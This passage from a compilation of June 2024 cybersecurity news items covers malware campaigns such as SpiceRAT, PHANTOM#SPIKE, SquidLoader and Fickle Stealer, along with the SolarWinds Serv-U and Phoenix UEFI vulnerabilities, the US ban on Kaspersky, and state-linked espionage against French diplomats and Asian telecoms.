the RAT payload – are extracted from a ZIP archive retrieved by the downloader
binary from a remote server.
SpiceRAT also takes advantage of the DLL side-loading technique to start a DLL loader, which captures the list of running processes to check if it's being debugged, followed by running the main module from memory.
"With the capability to download and run executable binaries and arbitrary commands, SpiceRAT significantly increases the attack surface on the victim's network, paving the way for further attacks," Talos said.
Military-themed Email Scam Spreads
Malware to Infect Pakistani Users
23.6.24
BigBrothers
The Hacker News
researchers have shed light on a new phishing campaign that has been identified
as targeting people in Pakistan using a custom backdoor.
Dubbed PHANTOM#SPIKE by Securonix, the unknown threat actors behind the activity have leveraged military-related phishing documents to activate the infection sequence.
"While there are many methods used today to deploy malware, the threat actors made use of ZIP files with a password-protected payload archive contained within," researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.
The campaign is notable for its lack of sophistication and the use of simple payloads to achieve remote access to target machines.
The email messages come bearing a ZIP archive that purports to be meeting
minutes related to the International Military-Technical Forum Army 2024, a
legitimate event organized by the Ministry of Defense of the Russian Federation.
It's set to be held in Moscow in mid-August 2024.
Present within the ZIP file is a Microsoft Compiled HTML Help (CHM) file and a hidden executable ("RuntimeIndexer.exe"), the former of which, when opened, displays the meeting minutes as well as a couple of images, but stealthily runs the bundled binary as soon as the user clicks anywhere on the document.
The executable is designed to function as a backdoor that establishes connections with a remote server over TCP in order to retrieve commands that are subsequently run on the compromised host.
In addition to passing along system information, it executes the commands via
cmd.exe, gathers the output of the operation, and exfiltrates it back to the
server. This includes running commands like systeminfo, tasklist, curl to
extract the public IP address using ip-api[.]com, and schtasks to set up
persistence.
"This backdoor essentially functions as a command line-based remote access trojan (RAT) that provides the attacker with persistent, covert, and secure access to the infected system," the researchers said.
"The ability to execute commands remotely and relay the results back to the C2 server allows the attacker to control the infected system, steal sensitive information or execute additional malware payloads."
SolarWinds Serv-U Vulnerability
Under Active Attack - Patch Immediately
23.6.24
Vulnerebility
The Hacker News
A recently patched high-severity flaw impacting SolarWinds Serv-U file transfer
software is being actively exploited by malicious actors in the wild.
The vulnerability, tracked as CVE-2024-28995 (CVSS score: 8.6), concerns a directory transversal bug that could allow attackers to read sensitive files on the host machine.
Affecting all versions of the software prior to and including Serv-U 15.4.2 HF 1, it was addressed by the company in version Serv-U 15.4.2 HF 2 (15.4.2.157) released earlier this month.
The list of products susceptible to CVE-2024-28995 is below -
Serv-U FTP Server 15.4
Serv-U Gateway 15.4
Serv-U MFT Server 15.4, and
Serv-U File Server 15.4
Security researcher Hussein Daher of Web Immunify has been credited with
discovering and reporting the flaw. Following the public disclosure, additional
technical details and a proof-of-concept (PoC) exploit have since been made
available.
firm Rapid7 described the vulnerability as trivial to exploit and that it allows external unauthenticated attackers to read any arbitrary file on disk, including binary files, assuming they know the path to that file and it's not locked.
"High-severity information disclosure issues like CVE-2024-28995 can be used in smash-and-grab attacks where adversaries gain access to and attempt to quickly exfiltrate data from file transfer solutions with the goal of extorting victims," it said.
"File transfer products have been targeted by a wide range of adversaries the past several years, including ransomware groups."
Indeed, according to threat intelligence firm GreyNoise, threat actors have
already begun to conduct opportunistic attacks weaponizing the flaw against its
honeypot servers to access sensitive files like /etc/passwd, with attempts also
recorded from China.
With previous flaws in Serv-U software exploited by threat actors, it's imperative that users apply the updates as soon as possible to mitigate potential threats.
"The fact that attackers are using publicly available PoCs means the barrier to entry for malicious actors is incredibly low," Naomi Buckwalter, director of product security at Contrast Security, said in a statement shared with The Hacker News.
"Successful exploitation of this vulnerability could be a stepping stone for attackers. By gaining access to sensitive information like credentials and system files, attackers can use that information to launch further attacks, a technique called 'chaining.' This can lead to a more widespread compromise, potentially impacting other systems and applications."
U.S. Bans Kaspersky Software, Citing National Security Risks
23.6.24
BigBrothers
The Hacker News
The U.S. Department of Commerce's Bureau of Industry and Security (BIS) on
Thursday announced a "first of its kind" ban that prohibits Kaspersky Lab's U.S.
subsidiary from directly or indirectly offering its security software in the
country.
The blockade also extends to the company's affiliates, subsidiaries and parent companies, the department said, adding the action is based on the fact that its operations in the U.S. posed a national security risk. News of the ban was first reported by Reuters.
"The company's continued operations in the United States presented a national security risk — due to the Russian Government's offensive cyber capabilities and capacity to influence or direct Kaspersky's operations — that could not be addressed through mitigation measures short of a total prohibition," the BIS said.
It further said Kaspersky is subject to the jurisdiction and control of the Russian government and that its software provides Kremlin access to sensitive U.S. customer information as well as allows for installing malicious software or withholding critical updates.
"The manipulation of Kaspersky software, including in U.S. critical
infrastructure, can cause significant risks of data theft, espionage, and system
malfunction," it noted. "It can also risk the country's economic security and
public health, resulting in injuries or loss of life."
As part of the ban, Kaspersky will be barred from selling its software to
American consumers and businesses starting on July 20. However, the company can
still provide software and antivirus signature updates to existing customers
until September 29.
It's also urging current individual and business customers to find suitable replacements within the 100-day time period so as to ensure that there are no gaps in security protections. That said, it's worth noting that they can continue to use the products should they choose to do so.
"Russia has shown time and again they have the capability and intent to exploit Russian companies, like Kaspersky Lab, to collect and weaponize sensitive U.S. information, and we will continue to use every tool at our disposal to safeguard U.S. national security and the American people," Secretary of Commerce Gina Raimondo said.
That's not all. Kaspersky has also been added to the Entity List for their "cooperation with Russian military and intelligence authorities in support of the Russian Government's cyber intelligence objectives."
The Moscow-headquartered firm, which serves over 400 million customers and 240,000 corporate clients across 200 countries including Piaggio, Volkswagen Group Retail Spain, and the Qatar Olympic Committee, has long been in the crosshairs of the U.S. government over its ties to Russia.
In September 2017, its products were banned from being used in federal networks, citing national security concerns. Weeks after that announcement, a Wall Street Journal report alleged Russian government hackers had stolen U.S. classified hacking tools stored on a National Security Agency (NSA) contractor's home computer because it was running Kaspersky software.
The New York Times reported days later that Israeli officials notified the U.S. of the espionage operation after they hacked into Kaspersky's network in 2015. The company responded saying it came across the code in 2014 when its antivirus software flagged a 7-Zip file as malicious on a U.S.-based computer.
The tool, later attributed to the Equation Group, was deleted and no third-parties saw the code, the company said at the time following an internal investigation. Equation Group is the name assigned by Kaspersky to a hacking crew with suspected ties to the NSA's Tailored Access Operations (TAO) cyberwarfare unit.
Nearly five years later, Kaspersky was added to the Federal Communications Commission's (FCC) "Covered List" of companies that pose an "unacceptable risk to the national security" of the country. Germany and Canada have enacted similar restrictions in recent years.
Responding to the latest move from the U.S. government, Kaspersky said the Commerce Department made its decision based on the current geopolitical climate and theoretical concerns, adding it "unfairly ignores" evidence of the transparency measures implemented by the company to demonstrate integrity and trustworthiness.
"The primary impact of these measures will be the benefit they provide to cybercrime," it said. "International cooperation between experts is crucial in the fight against malware, and yet this will restrict those efforts."
Researchers Uncover UEFI Vulnerability Affecting Multiple Intel CPUs
20.6.24
Vulnerebility
The Hacker News
researchers have disclosed details
of a now-patched security flaw in Phoenix SecureCore UEFI firmware that affects
multiple families of Intel Core desktop and mobile processors.
Tracked as CVE-2024-0762 (CVSS score: 7.5), the "UEFIcanhazbufferoverflow" vulnerability has been described as a case of a buffer overflow stemming from the use of an unsafe variable in the Trusted Platform Module (TPM) configuration that could result in the execution of malicious code.
"The vulnerability allows a local attacker to escalate privileges and gain code execution within the UEFI firmware during runtime," supply chain security firm Eclypsium said in a report shared with The Hacker News.
"This type of low-level exploitation is typical of firmware backdoors (e.g., BlackLotus) that are increasingly observed in the wild. Such implants give attackers ongoing persistence within a device and often, the ability to evade higher-level security measures running in the operating system and software layers."
Following responsible disclosure, the vulnerability was addressed by Phoenix Technologies in April 2024. PC maker Lenovo has also released updates for the flaw as of last month.
"This vulnerability affects devices using Phoenix SecureCore firmware running on select Intel processor families, including AlderLake, CoffeeLake, CometLake, IceLake, JasperLake, KabyLake, MeteorLake, RaptorLake, RocketLake, and TigerLake," the firmware developer said.
UEFI, a successor to BIOS, refers to motherboard firmware used during startup to initialize the hardware components and load the operating system via the boot manager.
The fact that UEFI is the first code that's run with the highest privileges has made it a lucrative target for threat actors looking to deploy bootkits and firmware implants that can subvert security mechanisms and maintain persistence without being detected.
This also means that vulnerabilities discovered in the UEFI firmware can pose a severe supply chain risk, as they can impact many different products and vendors at once.
"UEFI firmware is some of the most high-value code on modern devices, and any compromise of that code can give attackers full control and persistence on the device," Eclypsium said.
The development comes nearly a month after the company disclosed a similar unpatched buffer overflow flaw in HP's implementation of UEFI that impacts HP ProBook 11 EE G1, a device that reached end-of-life (EoL) status as of September 2020.
It also follows the disclosure of a software attack called TPM GPIO Reset that could be exploited by attackers to access secrets stored on disk by other operating systems or undermine controls that are protected by the TPM such as disk encryption or boot protections.
French Diplomatic Entities Targeted in
Russian-Linked Cyber Attacks
20.6.24
BigBrothers
The Hacker News
State-sponsored actors with ties to
Russia have been linked to targeted cyber attacks aimed at French diplomatic
entities, the country's information security agency ANSSI said in an advisory.
The attacks have been attributed to a cluster tracked by Microsoft under the name Midnight Blizzard (formerly Nobelium), which overlaps with activity tracked as APT29, BlueBravo, Cloaked Ursa, Cozy Bear, and The Dukes.
While the monikers APT29 and Midnight Blizzard have been interchangeably used to refer to intrusion sets associated with the Russian Foreign Intelligence Service (SVR), ANSSI said it prefers to treat them as disparate threat clusters alongside a third one dubbed Dark Halo, which has been held responsible for the 2020 supply chain attack via SolarWinds software.
"Nobelium is characterized by the use of specific codes, tactics, techniques, and procedures. Most of Nobelium campaigns against diplomatic entities use compromised legitimate email accounts belonging to diplomatic staff, and conduct phishing campaigns against diplomatic institutions, embassies, and consulates," the agency said.
It's worth noting that the targeting of diplomatic entities is also monitored under the name Diplomatic Orbiter.
The attacks entail sending phishing emails to French public organizations from foreign institutions and individuals previously compromised by the threat actor to initiate a series of malicious actions.
"In May 2023, several European embassies in Kyiv were targeted by a phishing campaign conducted by Nobelium's operators," it said. "The French embassy in Kyiv was one of the targets of this campaign, which was conducted through an email that was themed about a 'Diplomatic car for sale.'"
Another attack observed in the same month targeting the French Embassy in Romania was ultimately unsuccessful, ANSSI noted.
Other intrusions mounted by the threat actor have leveraged security flaws in JetBrains TeamCity servers as part of an opportunistic campaign. In recent months, it has also been linked to breaches of Microsoft and Hewlett Packard Enterprise (HPE).
"The targeting of IT and entities for espionage purposes by Nobelium operators potentially strengthens their offensive capabilities and the threat they represent," the agency said. "The intelligence gathered during recent attacks against IT sector entities could also facilitate Nobelium's future operations."
The disclosure comes as Poland revealed that Russian hackers could be behind the DDoS attack on Telewizja Polska (TVP) that led to the disruption of an online broadcast of the Euro 2024 soccer tournament on June 16, 2024.
Chinese Cyber Espionage Targets Telecom Operators in Asia Since 2021
20.6.24
BigBrothers
The Hacker News
Chinese Cyber Espionage
Cyber
espionage groups associated with China have been linked to a long-running
campaign that has infiltrated several telecom operators located in a single
Asian country at least since 2021.
"The attackers placed backdoors on the networks of targeted companies and also attempted to steal credentials," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News.
The firm did not reveal the country that was targeted, but said it found evidence to suggest that the malicious cyber activity may have started as far back as 2020.
The attacks also targeted an unnamed services company that catered to the telecoms sector and a university in another Asian country, it added.
The choice of tools used in this campaign overlaps with other missions conducted by Chinese espionage groups like Mustang Panda (aka Earth Preta and Fireant), RedFoxtrot (aka Neeedleminer and Nomad Panda), and Naikon (aka Firefly) in recent years.
This includes custom backdoors tracked as COOLCLIENT, QuickHeal, and RainyDay that come equipped with capabilities to capture sensitive data and establish communication with a command-and-control (C2) server.
While the exact initial access pathway used to breach the targets is presently unknown, the campaign is also notable for deploying port scanning tools and conducting credential theft through the dumping of Windows Registry hives.
The fact that the tooling has connections to three different adversarial collectives has raised several possibilities: The attacks are being conducted independently of each other, a single threat actor is using tools acquired from other groups, or diverse actors are collaborating on a single campaign.
Also unclear at this stage is the primary motive behind the intrusions, although Chinese threat actors have a history of targeting the telecoms sector across the world.
In November 2023, Kaspersky revealed a ShadowPad malware campaign targeting one of the national telecom companies of Pakistan by exploiting known security flaws in Microsoft Exchange Server (CVE-2021-26855 aka ProxyLogon).
"The attackers may have been gathering intelligence on the telecoms sector in that country," Symantec postulated. "Eavesdropping is another possibility. Alternatively, the attackers may have been attempting to build a disruptive capability against critical infrastructure in that country."
Experts Uncover New Evasive SquidLoader Malware Targeting Chinese Organizations
20.6.24
Virus
The Hacker News
researchers have uncovered a new
evasive malware loader named SquidLoader that spreads via phishing campaigns
targeting Chinese organizations.
AT&T LevelBlue Labs, which first observed the malware in late April 2024, said it incorporates features that are designed to thwart static and dynamic analysis and ultimately evade detection.
Attack chains leverage phishing emails that come with attachments that masquerade as Microsoft Word documents, but, in reality, are binaries that pave the way for the execution of the malware, which is then used to fetch second-stage shellcode payloads from a remote server, including Cobalt Strike.
"These loaders feature heavy evasion and decoy mechanisms which help them remain undetected while also hindering analysis," security researcher Fernando Dominguez said. "The shellcode that is delivered is also loaded in the same loader process, likely to avoid writing the payload to disk and thus risk being detected."
Some of the defensive evasion techniques adopted by SquidLoader encompass the
use of encrypted code segments, pointless code that remains unused, Control Flow
Graph (CFG) obfuscation, debugger detection, and performing direct syscalls
instead of calling Windows NT APIs.
Loader malware has become a popular commodity in the criminal underground for threat actors looking to deliver and launch additional payloads to compromised hosts, while bypassing antivirus defenses and other security measures.
Last year, Aon's Stroz Friedberg incident detailed a loader known as Taurus Loader that has been observed distributing the Taurus information stealer as well as AgentVX, a trojan with capabilities to execute more malware and set up persistence using Windows Registry changes, and gather data.
The development comes as a new in-depth analysis of a malware loader and backdoor referred to as PikaBot has highlighted that it continues to be actively developed by its developers since its emergence in February 2023.
"The malware employs advanced anti-analysis techniques to evade detection and
harden analysis, including system checks, indirect syscalls, encryption of
next-stage and strings, and dynamic API resolution," Sekoia said. "The recent
updates to the malware have further enhanced its capabilities, making it even
more challenging to detect and mitigate."
It also follows findings from BitSight that the infrastructure related to another loader malware called Latrodectus has gone offline in the wake of a law enforcement effort dubbed Operation Endgame that saw over 100 botnet servers, including those associated with IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot, dismantled.
The company said it observed nearly 5,000 distinct victims spread across 10 different campaigns, with a majority of the victims located in the U.S., the U.K., the Netherlands, Poland, France, Czechia, Japan, Australia, Germany, and Canada.
New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data
Exfiltration
20.6.24
Virus
The Hacker News
A new Rust-based information
stealer malware called Fickle Stealer has been observed being delivered via
multiple attack chains with the goal of harvesting sensitive information from
compromised hosts.
Fortinet FortiGuard Labs said it's aware of four different distribution methods -- namely VBA dropper, VBA downloader, link downloader, and executable downloader -- with some of them using a PowerShell script to bypass User Account Control (UAC) and execute Fickle Stealer.
The PowerShell script ("bypass.ps1" or "u.ps1") is also designed to periodically send information about the victim, including country, city, IP address, operating system version, computer name, and username to a Telegram bot controlled by the attacker.
The stealer payload, which is protected using a packer, runs a series of anti-analysis checks to determine if it's running in a sandbox or a virtual machine environment, following which it beacons out to a remote server to exfiltrate data in the form of JSON strings.
Fickle Stealer is no different from other variants in that it's designed to gather information from crypto wallets, web browsers powered by Chromium and the Gecko browser engine (i.e, Google Chrome, Microsoft Edge, Brave, Vivaldi, and Mozilla Firefox), and applications like AnyDesk, Discord, FileZilla, Signal, Skype, Steam, and Telegram.
It's also designed to export files matching the extensions .txt, .kdbx, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .odp, and wallet.dat.
"In addition to some popular applications, this stealer searches sensitive files in parent directories of common installation directories to ensure comprehensive data gathering," security researcher Pei Han Liao said. "It also receives a target list from the server, which makes Fickle Stealer more flexible."
The disclosure comes as Symantec disclosed details of an open-source Python stealer called AZStealer that comes with the functionality to steal a wide variety of information. Available on GitHub, it has been advertised as the "best undetected Discord stealer."
"All stolen information is zipped and depending on the size of the archive exfiltrated directly through Discord webhooks or first uploaded to Gofile online files storage and after that exfiltrated via Discord," the Broadcom-owned company said.
"AZStealer will also attempt the theft of document files with predefined targeted extensions or those having specific keywords such as password, wallet, backup, etc. in the filename."